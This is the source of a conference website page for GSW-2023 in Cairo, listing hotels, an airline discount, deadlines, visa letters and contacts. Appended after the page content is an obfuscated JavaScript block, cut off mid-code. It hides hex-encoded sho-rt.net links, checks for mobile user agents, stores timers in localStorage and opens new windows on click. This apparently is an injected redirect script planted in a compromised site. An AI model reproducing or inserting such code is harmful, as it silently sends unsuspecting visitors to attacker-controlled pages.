size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570659758{margin-top: 5px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 